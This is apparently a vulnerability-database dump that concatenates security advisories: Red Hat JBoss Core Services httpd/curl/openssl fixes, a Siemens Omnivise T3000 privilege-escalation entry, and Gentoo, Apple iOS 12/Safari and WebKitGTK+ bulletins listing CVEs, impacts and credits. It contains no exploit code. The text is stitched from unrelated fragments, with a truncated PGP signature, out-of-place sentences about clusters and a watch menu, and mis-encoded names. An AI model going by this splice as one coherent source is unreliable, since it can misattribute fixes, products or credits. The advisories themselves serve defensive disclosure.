C0pfoeTNknLDqKXTCCd8q3qurIX1oX4YTYDjn7F9lrsSQb/b7cv09VliE8xJyg/m yZ5qSsVjpIw= =RV0+ -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. This release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.51, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es): * curl: HSTS bypass via IDN (CVE-2022-42916) * curl: HTTP proxy double-free (CVE-2022-42915) * curl: POST following PUT confusion (CVE-2022-32221) * httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813) * httpd: mod_sed: DoS vulnerability (CVE-2022-30522) * httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615) * httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614) * httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377) * curl: control code in cookie denial of service (CVE-2022-35252) * jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330) * curl: Unpreserved file permissions (CVE-2022-32207) * curl: various flaws (CVE-2022-32206 CVE-2022-32208) * openssl: the c_rehash script allows command injection (CVE-2022-2068) * openssl: c_rehash script allows command injection (CVE-2022-1292) * jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721) * jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 Applications using the APR libraries, such as httpd, must be restarted for this update to take effect. After installing the updated packages, the httpd daemon will be restarted automatically. Bugs fixed (https://bugzilla.redhat.com/): 2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN 6. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. After the clusters are managed, you can use the APIs that are provided by the engine to distribute configuration based on placement policy
var-202408-0014 A vulnerability has been identified in Omnivise T3000 Application Server R9.2 (All versions), Omnivise T3000 Domain Controller R9.2 (All versions), Omnivise T3000 Product Data Management (PDM) R9.2 (All versions), Omnivise T3000 R8.2 SP3 (All versions), Omnivise T3000 R8.2 SP4 (All versions), Omnivise T3000 Terminal Server R9.2 (All versions), Omnivise T3000 Thin Client R9.2 (All versions), Omnivise T3000 Whitelisting Server R9.2 (All versions). The affected application regularly executes user modifiable code as a privileged user. This could allow a local authenticated attacker to execute arbitrary code with elevated privileges. omnivise t3000 application server , omnivise t3000 domain controller , omnivise t3000 product data management Unspecified vulnerabilities exist in multiple Siemens products.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Omnivise T3000 is a distributed control system used in fossil fuel and large renewable energy power plants
var-201904-1411 A cross-origin issue existed with "iframe" elements. This was addressed with improved tracking of security origins. This issue affected versions prior to iOS 12, watchOS 5, Safari 12, iTunes 12.9 for Windows, iCloud for Windows 7.7. plural Apple Product iframe The element has a flaw in cross-origin because it lacks security origin tracking.Information may be obtained and information may be altered. Apple Has released an update for each product.The expected impact depends on each vulnerability, but can be affected as follows: * Service operation interruption (DoS) * Arbitrary code execution * Script execution * information leak * Access restriction avoidance. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. WebKit is one of the web browser engine components. A security feature vulnerability exists in the WebKit component of several Apple products. An attacker could exploit this vulnerability to bypass security restrictions. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebkitGTK+: Multiple vulnerabilities Date: December 02, 2018 Bugs: #667892 ID: 201812-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebKitGTK+, the worst of which may lead to arbitrary code execution. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, from hybrid HTML/CSS applications to full-fledged web browsers. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.22.0 >= 2.22.0 Description =========== Multiple vulnerabilities have been discovered in WebKitGTK+. Please review the referenced CVE identifiers for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebkitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.22.0" References ========== [ 1 ] CVE-2018-4191 https://nvd.nist.gov/vuln/detail/CVE-2018-4191 [ 2 ] CVE-2018-4197 https://nvd.nist.gov/vuln/detail/CVE-2018-4197 [ 3 ] CVE-2018-4207 https://nvd.nist.gov/vuln/detail/CVE-2018-4207 [ 4 ] CVE-2018-4208 https://nvd.nist.gov/vuln/detail/CVE-2018-4208 [ 5 ] CVE-2018-4209 https://nvd.nist.gov/vuln/detail/CVE-2018-4209 [ 6 ] CVE-2018-4210 https://nvd.nist.gov/vuln/detail/CVE-2018-4210 [ 7 ] CVE-2018-4212 https://nvd.nist.gov/vuln/detail/CVE-2018-4212 [ 8 ] CVE-2018-4213 https://nvd.nist.gov/vuln/detail/CVE-2018-4213 [ 9 ] CVE-2018-4299 https://nvd.nist.gov/vuln/detail/CVE-2018-4299 [ 10 ] CVE-2018-4306 https://nvd.nist.gov/vuln/detail/CVE-2018-4306 [ 11 ] CVE-2018-4309 https://nvd.nist.gov/vuln/detail/CVE-2018-4309 [ 12 ] CVE-2018-4311 https://nvd.nist.gov/vuln/detail/CVE-2018-4311 [ 13 ] CVE-2018-4312 https://nvd.nist.gov/vuln/detail/CVE-2018-4312 [ 14 ] CVE-2018-4314 https://nvd.nist.gov/vuln/detail/CVE-2018-4314 [ 15 ] CVE-2018-4315 https://nvd.nist.gov/vuln/detail/CVE-2018-4315 [ 16 ] CVE-2018-4316 https://nvd.nist.gov/vuln/detail/CVE-2018-4316 [ 17 ] CVE-2018-4317 https://nvd.nist.gov/vuln/detail/CVE-2018-4317 [ 18 ] CVE-2018-4318 https://nvd.nist.gov/vuln/detail/CVE-2018-4318 [ 19 ] CVE-2018-4319 https://nvd.nist.gov/vuln/detail/CVE-2018-4319 [ 20 ] CVE-2018-4323 https://nvd.nist.gov/vuln/detail/CVE-2018-4323 [ 21 ] CVE-2018-4328 https://nvd.nist.gov/vuln/detail/CVE-2018-4328 [ 22 ] CVE-2018-4358 https://nvd.nist.gov/vuln/detail/CVE-2018-4358 [ 23 ] CVE-2018-4359 https://nvd.nist.gov/vuln/detail/CVE-2018-4359 [ 24 ] CVE-2018-4361 https://nvd.nist.gov/vuln/detail/CVE-2018-4361 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201812-04 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. License ======= Copyright 2018 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . Alternatively, on your watch, select "My Watch > General > About". -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 APPLE-SA-2018-10-30-8 Additional information for APPLE-SA-2018-9-24-4 iOS 12 iOS 12 addresses the following: Accounts Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local app may be able to read a persistent account identifier Description: This issue was addressed with improved entitlements. CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Auto Unlock Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to access local users AppleIDs Description: A validation issue existed in the entitlement verification. CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc. Bluetooth Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7, iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation, 12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro, 9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic Description: An input validation issue existed in Bluetooth. CVE-2018-5383: Lior Neumann and Eli Biham CFNetwork Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4412: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A memory corruption issue was addressed with improved input validation. CVE-2018-4414: The UK's National Cyber Security Centre (NCSC) Entry added October 30, 2018 CoreMedia Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An app may be able to learn information about the current camera view before being granted camera access Description: A permissions issue existed. CVE-2018-4356: an anonymous researcher CoreText Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text file may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4347: an anonymous researcher Entry added October 30, 2018 Crash Reporter Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4333: Brandon Azad Grand Central Dispatch Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4426: Brandon Azad Entry added October 30, 2018 Heimdal Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4331: Brandon Azad CVE-2018-4332: Brandon Azad CVE-2018-4343: Brandon Azad Entry added October 30, 2018 iBooks Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Parsing a maliciously crafted iBooks file may lead to disclosure of user information Description: A configuration issue was addressed with additional restrictions. CVE-2018-4355: evi1m0 of bilibili security team Entry added October 30, 2018 IOHIDFamily Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved input validation CVE-2018-4408: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to break out of its sandbox Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4341: Ian Beer of Google Project Zero CVE-2018-4354: Ian Beer of Google Project Zero Entry added October 30, 2018 IOKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2018-4383: Apple Entry added October 30, 2018 IOMobileFrameBuffer Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4335: Brandon Azad IOUserEthernet Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4401: Apple Entry added October 30, 2018 iTunes Store Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to spoof password prompts in the iTunes Store Description: An input validation issue was addressed with improved input validation. CVE-2018-4305: Jerry Decime Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to leak sensitive user information Description: An access issue existed with privileged API calls. CVE-2018-4399: Fabiano Anemone (@anoane) Entry added October 30, 2018 Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: An input validation issue existed in the kernel. CVE-2018-4363: Ian Beer of Google Project Zero Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to execute arbitrary code Description: A memory corruption issue was addressed with improved validation. CVE-2018-4407: Kevin Backhouse of Semmle Ltd. Entry added October 30, 2018 Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4336: Brandon Azad CVE-2018-4337: Ian Beer of Google Project Zero CVE-2018-4340: Mohamed Ghannam (@_simo36) CVE-2018-4344: The UK's National Cyber Security Centre (NCSC) CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 mDNSOffloadUserClient Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team Entry added October 30, 2018 MediaRemote Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: An access issue was addressed with additional sandbox restrictions. CVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs Entry added October 30, 2018 Messages Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted messages Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Notes Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover a user's deleted notes Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4352: Utku Altinkaynak Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to discover websites a user has visited Description: A consistency issue existed in the handling of application snapshots. CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western Governor's University (WGU) Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A user may be unable to delete browsing history items Description: Clearing a history item may not clear visits with redirect chains. CVE-2018-4329: Hugo S. Diaz (coldpointblue) SafariViewController Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4362: Jun Kokatsu (@shhnjk) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to exfiltrate autofilled data in Safari Description: A logic issue was addressed with improved state management. CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A local user may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2018-4395: Patrick Wardle of Digita Security Entry added October 30, 2018 Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker may be able to exploit weaknesses in the RC4 cryptographic algorithm Description: This issue was addressed by removing RC4. CVE-2016-1777: Pepi Zawodsky Status Bar Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to determine the last used app from the lock screen Description: A logic issue was addressed with improved restrictions. CVE-2018-4325: Brian Adeloye Symptom Framework Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative Entry added October 30, 2018 Text Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted text file may lead to a denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-4304: jianan.huang (@Sevck) Entry added October 30, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative CVE-2018-4323: Ivan Fratric of Google Project Zero CVE-2018-4328: Ivan Fratric of Google Project Zero CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative CVE-2018-4359: Samuel GroA (@5aelo) CVE-2018-4360: William Bowling (@wcbowling) Entry added October 30, 2018 WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may cause unexepected cross-origin behavior Description: A cross-origin issue existed with "iframe" elements. CVE-2018-4319: John Pettitt of Google WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2018-4345: an anonymous researcher WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory corruption issue was addressed with improved validation. CVE-2018-4191: found by OSS-Fuzz WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Cross-origin SecurityErrors includes the accessed frame's origin Description: The issue was addressed by removing origin information. CVE-2018-4311: Erling Alf Ellingsen (@steike) WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to execute scripts in the context of another website Description: A cross-site scripting issue existed in Safari. CVE-2018-4309: an anonymous researcher working with Trend Micro's Zero Day Initiative WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Unexpected interaction causes an ASSERT failure Description: A memory consumption issue was addressed with improved memory handling. CVE-2018-4361: found by OSS-Fuzz Additional recognition APFS We would like to acknowledge Umang Raghuvanshi for their assistance. Assets We would like to acknowledge Brandon Azad for their assistance. configd We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss GmbH for their assistance. Core Data We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. CoreSymbolication We would like to acknowledge Brandon Azad for their assistance. Exchange ActiveSync We would like to acknowledge Jesse Thompson of University of Wisconsin-Madison for their assistance. Kernel We would like to acknowledge Brandon Azad for their assistance. Mail We would like to acknowledge Alessandro Avagliano of Rocket Internet SE, Gunnar Diepenbruck, and Zbyszek A>>A3Akiewski for their assistance. MediaRemote We would like to acknowledge Brandon Azad for their assistance. Safari We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad Galbin for their assistance. Security We would like to acknowledge Christoph Sinai, Daniel Dudek (@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak) of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson Ding, and an anonymous researcher for their assistance. SQLite We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security Labs GmbH for their assistance. Status Bar We would like to acknowledge Ju Zhu of Meituan and Moony Li and Lilang Wu of Trend Micro for their assistance. WebKit We would like to acknowledge Cary Hartline, Hanming Zhang from 360 Vuclan team, Tencent Keen Security Lab working with Trend Micro's Zero Day Initiative, and Zach Malone of CA Technologies for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "iOS 12". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgYpHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3HbuA// ZOEwXUyLVS3SqfEjU3MRUoTp1x+Ow+fd5co9B6v7bY+Ebc2KmSZjpPuNPjouRHmf RbWpZ0Mc52NYm+OdYqPu/Tg94wRi6tlrYusk6GngVH4IBER4TqiFrLNSzAjXL0xP qWv3JQcAIFNbNWpSEzDzEbuq85q4BIuP/+v2LpTc1ZWqIYt9TQHxUpyjoTXZvQhL 8L9ZM/dj8BC+m713LeC/KzveaDpaqnVJUDbgUkzRyFfFqOJt+hlaTS8yMUM3G+TX cblL8bvFNIxtUrt4Rf2TwDRVxUZIw/aFK2APmxVZ44UAT+2o+WFxBkHRXQiZc4Lk OaTzzkocdZu4q4MibrxELBWtW46AcGMqQKUpFZ6GR+4U2c1ICRwKnjQTn0iY7mg7 d+M+bTx8T2knwV7lSwvnHz79rysvOuCF3QCAZ4tW4PvLHWSZ0TpJho8z23PLHFQd J3cOYPby6SM9YP6SBISX5OI8xnvr1XIAPIBnOy0ScaMFsu0Er8j1hvbF1fXiaYOJ CSUUXR2th3jPW0g9L0j4vWGURG1h0psIN2MxTSHbmm4KXBAYngZ0wDOeJMUe8YMy IG0UBDqKNh8lzKHcc4aYA1WyaNsqbgbngBqDATp/XyWRzd+Py/U06MVuIaV095Rv s9WW67M1kLHy4BeutXt+xLBp9AugI+gU53uysxcnBx4= =dGPm -----END PGP SIGNATURE----- . Installation note: Safari 12 may be obtained from the Mac App Store. ----------------------------------------------------------------------- WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0007 ------------------------------------------------------------------------ Date reported : September 26, 2018 Advisory ID : WSA-2018-0007 WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0007.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0007.html CVE identifiers : CVE-2018-4207, CVE-2018-4208, CVE-2018-4209, CVE-2018-4210, CVE-2018-4212, CVE-2018-4213, CVE-2018-4191, CVE-2018-4197, CVE-2018-4299, CVE-2018-4306, CVE-2018-4309, CVE-2018-4311, CVE-2018-4312, CVE-2018-4314, CVE-2018-4315, CVE-2018-4316, CVE-2018-4317, CVE-2018-4318, CVE-2018-4319, CVE-2018-4323, CVE-2018-4328, CVE-2018-4358, CVE-2018-4359, CVE-2018-4361. Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit. CVE-2018-4207 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4208 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4209 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4210 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction with indexing types caused a failure. CVE-2018-4212 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4213 Versions affected: WebKitGTK+ before 2.20.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4191 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. CVE-2018-4197 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4299 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroI2 (saelo) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4306 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4309 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to an anonymous researcher working with Trend Micro's Zero Day Initiative. A malicious website may be able to execute scripts in the context of another website. CVE-2018-4311 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Erling Alf Ellingsen (@steike). Cross-origin SecurityErrors includes the accessed frameas origin. CVE-2018-4312 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4314 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4315 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4316 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4317 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4318 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. CVE-2018-4319 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to John Pettitt of Google. A malicious website may cause unexepected cross-origin behavior. CVE-2018-4323 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4328 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Ivan Fratric of Google Project Zero. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4358 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to @phoenhex team (@bkth_ @5aelo @_niklasb) working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4359 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Samuel GroA (@5aelo). Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4361 Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0. Credit to Google OSS-Fuzz. Unexpected interaction causes an ASSERT failure. We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases. Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/. The WebKitGTK+ and WPE WebKit team, September 26, 2018
